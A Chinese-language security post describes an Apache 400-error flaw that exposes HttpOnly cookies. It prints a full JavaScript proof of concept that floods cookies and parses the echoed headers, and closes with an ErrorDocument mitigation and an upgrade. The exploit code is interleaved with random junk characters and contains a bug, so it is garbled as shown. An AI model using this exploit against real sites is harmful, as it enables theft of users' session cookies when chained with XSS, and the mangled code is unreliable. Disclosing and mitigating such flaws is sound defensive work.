很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。

用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:

// http://www.exploit-db.com/exploits/18442/
D8 h, q) Z& A7 h/ H0 lfunction setCookies (good) {
8 X F1 }; z. h6 k1 h// Construct string for cookie value- e7 ~" Q' p2 `) s, t2 Q
var str = "";
' g" a3 c3 Q. z* @for (var i=0; i< 819; i++) {
. R" x. o8 K9 d9 f7 M/ ^# P6 E estr += "x";
. Q+ O9 [' N$ s3 J1 g( R}
! V* v, L% n: ~' Z8 h+ q( [// Set cookies
( L5 |' e {6 {' m; E9 M7 G% yfor (i = 0; i < 10; i++) {
, }* ~& b( ?& Q) ~- X7 B- u// Expire evil cookie
: A% b1 @2 W3 Lif (good) {
* Y o6 t$ k6 q1 b5 Evar cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";: `" L2 w) \" D) n( r
}
# u$ h! S7 ^/ h0 s% o- j( v9 f6 p// Set evil cookie
# e8 X% s7 }! Y3 `8 Delse {6 c0 H0 ]/ S+ p' A
var cookie = "xss"+i+"="+str+";path=/";
m! d7 I1 P7 @0 o# S5 r6 N7 [! W}
0 M' j( T" s! Q7 ]& I1 bdocument.cookie = cookie;& M7 y# g3 d7 Y+ H( T7 ?! d
}3 ]" G/ k, u: D7 t; D
}: z7 y7 U2 {2 V" V1 r1 P6 N8 o) K. n
// Sends a GET / through XMLHttpRequest after setCookies() has inflated the Cookie header,
// and inspects the response only when it is a 400 error. The nested parseCookies handler
// extracts the <pre> block from the error body, strips the "Cookie: " prefix and the
// xssN filler entries, splits the remainder on ';' into a name->value object, calls
// setCookies(true) to remove the filler cookies, and shows the object in an alert.
// Defender note: the only reason this works is that the server reflects the received
// request headers into the 400 response body. A response that does not echo request
// headers (see the ErrorDocument fix below) gives this routine nothing to parse.
function makeRequest() {
// Plant the filler cookies first; the XHR below then carries them automatically.
/ M7 }5 v0 _# P2 P4 y: i+ asetCookies();9 F) d3 C j, T/ C6 ^
// readyState handler; `xhr` is the function-scoped var declared further down
// (hoisted), and is assigned before the handler can fire.
function parseCookies () {: T- r5 [4 I6 ^% V: F
var cookie_dict = {};) p: W9 C7 s, S( J W
// Only react on 400 status7 k5 |' G( ?0 \" ?; c1 [5 u
if (xhr.readyState === 4 && xhr.status === 400) {0 O9 c; x0 |; b, o$ S/ M
// Replace newlines and match <pre> content I3 i( ?: b* Q ]
// match() returns null when there is no <pre>…</pre>; `content.length` below would throw then.
var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);6 @; E9 O" T8 _2 ? ~
if (content.length) {
7 X3 o$ e* `6 @: {8 f: ]// Remove Cookie: prefix9 [$ O2 t5 w+ S& _, l! F4 @. g0 w
content = content[1].replace("Cookie: ", "");3 O& o3 W! A c1 `9 d4 l; }
// Drop the xssN filler entries this script planted, keep everything else.
var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
3 E# K/ t0 ]" `0 N// Add cookies to object
0 @ V% f* X6 j) Ffor (var i=0; i<cookies.length; i++) {
) |& d! _. E0 j3 s; Y" J$ W" W; ivar s_c = cookies.split('=',2);1 t! d0 ^+ u7 {) w$ a ?0 S
cookie_dict[s_c[0]] = s_c[1];
9 h1 \2 o: v3 I3 d+ W) B. A}
: Z& {, ]1 G! @) X, ]4 B v+ p}
$ `# O" I& ^2 }) {" O$ H// Unset malicious cookies
1 W; ?% _5 q& k- y" JsetCookies(true);7 U4 h* F" y5 |0 ~
alert(JSON.stringify(cookie_dict));
; `* M& A, p* Y( Z}
& }2 {) r1 ~! D4 P F$ B+ f}# j0 m; K0 M$ }3 y- \
// Make XHR request$ o+ s* F9 H# r
var xhr = new XMLHttpRequest();
- a* Q* W$ U, c% \; \/ Y1 |1 mxhr.onreadystatechange = parseCookies;; M% g1 ~4 P9 V& W# }
// Same-origin GET of the site root; async, so parseCookies runs later.
xhr.open("GET", "/", true);5 ?" _5 _9 X c- J) [
xhr.send(null);, K' N$ Y2 i1 i$ t
}
" W% \5 A: U0 x5 N* r& w2 k& emakeRequest();
" h1 ?0 j6 T/ U8 y" _- ~9 I' F; c1 R) s9 j6 }
你就能看见华丽丽的400错误包含着cookie信息。" U3 W: V j8 b
" v/ q. z0 l; R& f: z; `" ^5 ~! l
下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#/ B% ]7 ?" k# e3 y; |( E2 |
1 @5 [8 b! Z& M& m; a6 @+ a) O
修复方案:
& x* n3 m, d- _" k( Q! y( Z: S0 V: Z; o6 b. [" u! z2 b! O
Apache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下

In the event of a problem or error, Apache can be configured to do one of four things,
1. output a simple hardcoded error message 输出一个简单生硬的错误代码信息
2. output a customized message 输出一段信息
3. redirect to a local URL-path to handle the problem/error 转向一个本地的自定义页面
4. redirect to an external URL to handle the problem/error 转向一个外部URL

经测试,对于400错误只有方法2(输出自定义信息)有效,返回包不会再包含cookie内容

Apache配置:
ErrorDocument 400 " security test"
当然,升级apache到最新也可:)。(自定义错误页只是缓解,升级到已修复版本才是根本解决。)

参考:http://httpd.apache.org/security/vulnerabilities_22.html